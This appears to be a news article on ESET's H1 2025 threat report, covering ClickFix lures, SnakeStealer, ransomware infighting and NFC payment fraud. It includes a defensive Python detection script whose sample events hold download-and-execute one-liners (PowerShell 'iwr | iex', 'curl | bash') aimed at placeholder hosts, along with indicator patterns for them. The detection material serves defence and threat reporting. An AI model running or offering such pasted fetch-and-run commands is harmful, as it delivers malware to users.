ClickFix, SnakeStealer, and NFC fraud dominate ESET threat landscape in H1 2025 cybersecurity report

ESET’s H1 2025 Threat Report reveals a 500% rise in ClickFix attacks and mobile malware spikes. Explore key risks and digital threat shifts now.


Why is ClickFix now the second most common cyberattack method according to ESET’s 2025 report?

ESET, a global leader in endpoint protection and threat research, has identified a dramatic shift in the digital threat landscape in the first half of 2025. According to its latest Threat Report, the deceptive attack vector known as ClickFix surged by over 500% compared to the second half of 2024, becoming the second most common attack method globally after phishing. This single tactic was responsible for nearly 8% of all threats blocked through ESET telemetry during the reporting period.

ClickFix lures users with convincing but fake system error messages that instruct them to "fix" the problem by copying a command and pasting it into a terminal or command prompt. Because the victim executes the command, the technique needs no software exploit and sidesteps controls built around malicious attachments and downloads, and it works on Windows, Linux, and macOS alike. According to ESET's Director of Threat Prevention Labs, Jiří Kropáč, ClickFix is delivering a wide array of payloads: infostealers, ransomware, remote access trojans, cryptominers, post-exploitation frameworks, and even custom nation-state-aligned malware.

First observed in 2024, ClickFix's rise coincides with a broader shift in how attackers operate: exploiting human psychology rather than software vulnerabilities. Analysts read its emergence as a change in threat actor priorities, from exploiting code to manipulating behaviour, which underscores the need for stronger user education and endpoint visibility across all device types.
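Because the victim launches the command by hand, ClickFix leaves a distinctive trace in process-creation telemetry: a script interpreter spawned from an interactive parent (explorer.exe, which also parents anything typed into the Win+R Run dialog, or a terminal) with a command line that looks like a pasted one-liner. The following is an added example, not ESET's detection logic or any code from the report; the event format, the interactive-parent and interpreter lists, the indicator regexes and the sample events are all constructed for the example, and the URLs use the reserved `example.invalid` name.

```python
"""Heuristic hunt for ClickFix-style executions in process-creation events.

Added example, not ESET's detection logic. The event format (dicts with host,
user, parent, image, cmdline) and the indicator list are assumptions.
"""
import re
from typing import Dict, List, Optional

# Parents a human would be driving when they paste a command. On Windows the
# Win+R Run dialog spawns its child under explorer.exe; terminals cover the rest.
INTERACTIVE_PARENTS = {
    "explorer.exe", "windowsterminal.exe", "conhost.exe", "cmd.exe",
    "terminal", "iterm2", "gnome-terminal-server", "konsole",
    "bash", "zsh", "sh",
}

# Interpreters and downloaders that a pasted one-liner typically invokes.
INTERPRETERS = {
    "powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "msiexec.exe",
    "bash", "sh", "zsh", "osascript", "curl", "wget",
}

# (pattern, label): traits of a pasted "fix" command. Assumed heuristics.
INDICATORS = [
    (re.compile(p, re.IGNORECASE), label) for p, label in [
        (r"-(?:enc|encodedcommand|ec|e)\s+[A-Za-z0-9+/=]{40,}", "base64-encoded PowerShell"),
        (r"\b(?:iwr|irm|iex|invoke-webrequest|invoke-restmethod|invoke-expression|"
         r"downloadstring|downloadfile)\b", "download/execute cmdlet"),
        (r"https?://\S+", "remote URL in command line"),
        (r"\b(?:curl|wget)\b[^|]*\|\s*(?:sh|bash|zsh)\b", "remote script piped to shell"),
        (r"\$\(\s*(?:curl|wget)\b", "executes output of curl/wget"),
        (r"-w(?:indowstyle)?\s+hidden", "hidden window"),
        (r"\bmshta(?:\.exe)?\s+https?://", "mshta loading a URL"),
        (r"\bbase64\s+(?:-d|--decode)\b", "base64 decode"),
    ]
]

MIN_INDICATORS = 2  # a lone URL is routine admin work; demand two traits


def basename(path: str) -> str:
    """Last path component, lower-cased, for either path separator."""
    return re.split(r"[\\/]", path)[-1].lower()


def analyze(event: Dict[str, str]) -> Optional[Dict[str, object]]:
    """Return a finding for a ClickFix-like event, or None."""
    image, parent = basename(event["image"]), basename(event["parent"])
    if image not in INTERPRETERS or parent not in INTERACTIVE_PARENTS:
        return None  # scripted or service launches are out of scope here
    hits = [label for pat, label in INDICATORS if pat.search(event["cmdline"])]
    if len(hits) < MIN_INDICATORS:
        return None
    return {"host": event["host"], "user": event["user"], "parent": parent,
            "image": image, "indicators": hits}


def scan(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Run analyze() over a batch and keep only the findings."""
    return [f for f in (analyze(e) for e in events) if f]


# Constructed sample events (not real telemetry); example.invalid is a reserved name.
SAMPLE_EVENTS = [
    {"host": "ws01", "user": "alice", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -c "iwr http://example.invalid/fix.ps1 | iex"'},
    {"host": "mac02", "user": "bob",
     "parent": "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal",
     "image": "/bin/bash",
     "cmdline": 'bash -c "$(curl -fsSL http://example.invalid/fix.sh)"'},
    {"host": "ws01", "user": "alice", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -NoProfile -Command Get-Service Spooler"},
    {"host": "srv03", "user": "SYSTEM", "parent": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -c "iwr https://updates.example.invalid/manifest.json"'},
    {"host": "lx04", "user": "carol", "parent": "/usr/bin/bash", "image": "/bin/sh",
     "cmdline": 'sh -c "curl -s http://example.invalid/setup.sh | bash"'},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(f"{finding['host']} {finding['user']}: {finding['parent']} -> "
              f"{finding['image']} [{', '.join(finding['indicators'])}]")
```

Of the five constructed events, the first, second and fifth are flagged (hidden window plus download cmdlet plus URL on Windows; command substitution of a curl fetch on macOS; curl piped to bash on Linux), while the benign `Get-Service` call and the service-launched download under svchost.exe are not. The parent-process requirement is what keeps ordinary scheduled scripts out of the results; tune the indicator list and threshold against your own baseline before alerting on it.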

A visual representation of ClickFix-style fake error attacks and digital fraud vectors, which dominated ESET’s H1 2025 cybersecurity threat landscape.

What factors contributed to SnakeStealer overtaking Agent Tesla as the leading infostealer in 2025?

Another significant development noted in the ESET Threat Report H1 2025 is the rise of SnakeStealer, also known as Snake Keylogger, which has overtaken Agent Tesla to become the most commonly detected infostealer across ESET’s global telemetry. SnakeStealer is capable of logging keystrokes, extracting stored credentials, collecting clipboard data, and taking screenshots of infected systems, offering threat actors a versatile toolkit for information theft.

Analysts attribute SnakeStealer’s growing appeal to its modularity and adaptability across campaigns. It is frequently delivered through ClickFix lures, a pairing that tends to slip past signature-based antivirus because the victim, rather than a conventional dropper, launches the first stage. The continued decline in Agent Tesla detections suggests the aging malware family is losing effectiveness or popularity among cybercriminals.


ESET also reported progress in its collaboration with law enforcement and threat intelligence networks to dismantle malware-as-a-service ecosystems, including coordinated takedown operations targeting Lumma Stealer and Danabot. Prior to being disrupted, both services saw increased activity, with Lumma rising 21% and Danabot surging 52% in usage compared to H2 2024. This reinforces the conclusion that demand for credential theft and surveillance tools remains strong, even amid law enforcement crackdowns.

How have internal disputes among ransomware gangs like RansomHub impacted the broader threat ecosystem?

Despite a rise in ransomware activity during 2024 and early 2025, ESET’s data indicates that ransom payments have declined—suggesting a breakdown in trust between attackers and victims. The report attributes this trend to several contributing factors, including the collapse of some ransomware-as-a-service groups, exit scams, and increasing pressure from coordinated global takedowns.

RansomHub, one of the most prominent ransomware ecosystems, was directly affected by infighting among affiliates and rival factions. These disputes disrupted operations, delayed ransom negotiations, and undermined the group’s credibility with victims. Analysts believe this internal chaos creates openings for defenders, because fractured operations coordinate less well and respond more slowly.

While the number of active ransomware groups continues to grow, their operational capacity appears more volatile than ever. The combination of internal disputes and heightened law enforcement pressure may help explain why some ransomware groups are shifting their tactics toward faster, smaller payouts and data theft, rather than large-scale encryption events.

What is the strategic significance of the surge in mobile adware and NFC fraud malware for enterprise security?

On the mobile front, ESET’s H1 2025 report identifies a 160% increase in Android adware detections, fueled primarily by the emergence of a sophisticated malware family named Kaleidoscope. This new threat adopts an “evil twin” strategy, distributing apps that appear legitimate but instead bombard users with invasive advertisements, draining device resources and opening the door to further infection.


Even more alarming, however, is the explosion in near-field communication (NFC)-based fraud. According to ESET, these attacks increased by more than 35-fold during the first half of 2025. Threat actors are leveraging tools such as GhostTap and SuperCard X to steal credit card information and clone it into digital wallets, which are then used to make fraudulent contactless payments globally.

GhostTap operates by harvesting card credentials and syncing them to an attacker’s mobile device, while SuperCard X presents itself as a harmless NFC utility but operates as a malware-as-a-service platform with built-in relay capabilities. Institutional investors and cybersecurity researchers have flagged these developments as particularly troubling for financial institutions and payment processors, who now face a growing volume of mobile-based fraud vectors that evade traditional point-of-sale defenses.

What broader cybersecurity trends are reflected in ESET’s H1 2025 threat analysis?

The first half of 2025 paints a picture of an increasingly diversified and behaviorally driven threat landscape. From the ClickFix attack’s social engineering ingenuity to the rise of modular mobile malware and fractured ransomware syndicates, the report signals a pivot away from traditional code exploits toward more adaptive, user-centric attack models.

In response to these evolving threats, enterprise security providers are being urged to invest in more dynamic behavioral analytics, integrated endpoint detection and response (EDR), and targeted employee training. Institutional investors monitoring the cybersecurity industry suggest that firms offering next-generation AI-native solutions—particularly those combining telemetry with real-time response—are likely to see growing demand in the second half of 2025.


ESET’s own detection and disruption efforts underscore the strategic role of collaborative threat intelligence in countering the malware-as-a-service business model. While the threat landscape remains volatile, the continued involvement of private-sector cybersecurity firms in dismantling criminal infrastructure provides hope for greater resilience.

What is the expected outlook for threat vectors such as ClickFix, SnakeStealer, and NFC fraud in H2 2025?

Looking ahead to the second half of the year, analysts expect further developments in social engineering campaigns, particularly those targeting multi-platform users. ClickFix and SnakeStealer are expected to remain dominant threats, as their low entry costs and high success rates make them attractive to a wide range of cybercriminals. The trajectory of mobile and NFC-based fraud also points to higher risks for digital wallets and contactless payment ecosystems, especially in regions with high mobile penetration and limited fraud oversight.

Cybersecurity providers are preparing for further evolution in these attack patterns, with a growing emphasis on real-time behavioral defense models and cross-platform security orchestration. Meanwhile, ESET is expected to release additional telemetry data later in 2025, which will offer more clarity on how successful current mitigation strategies have been in reducing the prevalence of these attack types.

